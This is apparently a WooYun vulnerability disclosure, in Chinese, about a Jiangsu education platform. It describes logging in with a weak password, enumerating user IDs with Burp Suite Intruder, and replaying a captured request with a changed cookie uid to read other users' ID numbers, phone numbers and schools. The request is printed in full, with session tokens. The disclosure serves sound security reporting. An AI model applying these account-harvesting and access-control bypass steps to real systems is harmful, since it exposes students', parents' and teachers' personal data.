WooYun.org

登陆地址http://**.**.**.**/login.aspx
使用一个账号为 CXZX王力 密码123456 登陆
先来做一个信息收集
点击右上角 找人~ 在搜索栏里随便输入一个c
出来一大堆用户，点击发现地址栏里有id= ~
于是使用Burpsuite搜集账号

使用Burpsuite，修改id。使用Interder搜集了一大堆账号

再先退出登陆，使用搜集的账号进行登陆

虽然密码用MD5的方法加了密，然而并没什么卵用0.0
------------------------------------------我是分界线，下面是重点
这里是一枚越权
首先，使用一个账号登陆。经过上面的步骤，账号已经数不胜数了
登陆后有一个基本信息

<
打开Burpsuite拦截
刷新页面
GET /index.php?m=ta&id=50383629 HTTP/1.1
Host: **.**.**.**
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: jse_up=uid%3d50378298%26username%3dcxzx%e7%8e%8b%e5%8a%9b%26nickname%3d%e5%9f%8e%e8%a5%bf%e4%b8%ad%e5%ad%a6%e7%8e%8b%e5%8a%9b%26name%3d%e7%8e%8b%e5%8a%9b%26locationcode%3d320721%26location%3d%e8%b5%a3%e6%a6%86%e5%8e%bf%26orgcode%3d3207213006%26orgname%3d%e8%bf%9e%e4%ba%91%e6%b8%af%e5%b8%82%e5%9f%8e%e8%a5%bf%e4%b8%ad%e5%ad%a6%26orgtype%3dS%26utype%3d4%26d_utype%3d4%26isadm%3dFalse%26email%3d%26url%3d%26p_img%3dhttp%3a%2f%**.**.**.**%2ffs%2fPlatformAvatar%2fao-z1-d1%2f50378298%26domain%3d%26gender%3d1%26orglocationcode%3d320721%26orglocationname%3d%e8%b5%a3%e6%a6%86%e5%8e%bf%26ismaster%3dFalse; jse_ut=b2F1dGhfdG9rZW49MmZiNWY1OTU2M2NlNDIzNmFhN2ZiZTI1YTA4NmUzMDY1MDM3ODI5OCZvYXV0aF90b2tlbl9zZWNyZXQ9MTZkOGJiZGYtMDYwMy00NDQ5LTg0MmYtMzI0OWQ3ZDhkNTMw; jse_id=MGJlOGE0ZGMtMDhmNi00MzUzLWIyMzktNGM4ZDY5MzM5ZWM2; PHPSESSID=dgt96butt30mng5o37d128l7s6; IS_MOBILE_AGENT=0; __rrt_wId=797
将Cookie: jse_up=uid%3d50378298%26username%3dcxzx% 中的uid 50378298进行修改 随便成50378124吧，只要id存在就行。
此处泄露了用户身份证信息，手机号，部分邮箱，教师或者学生，家长所在学校。因为是江苏全省，通过id数量就可以看出用户数量多，信息量大大的~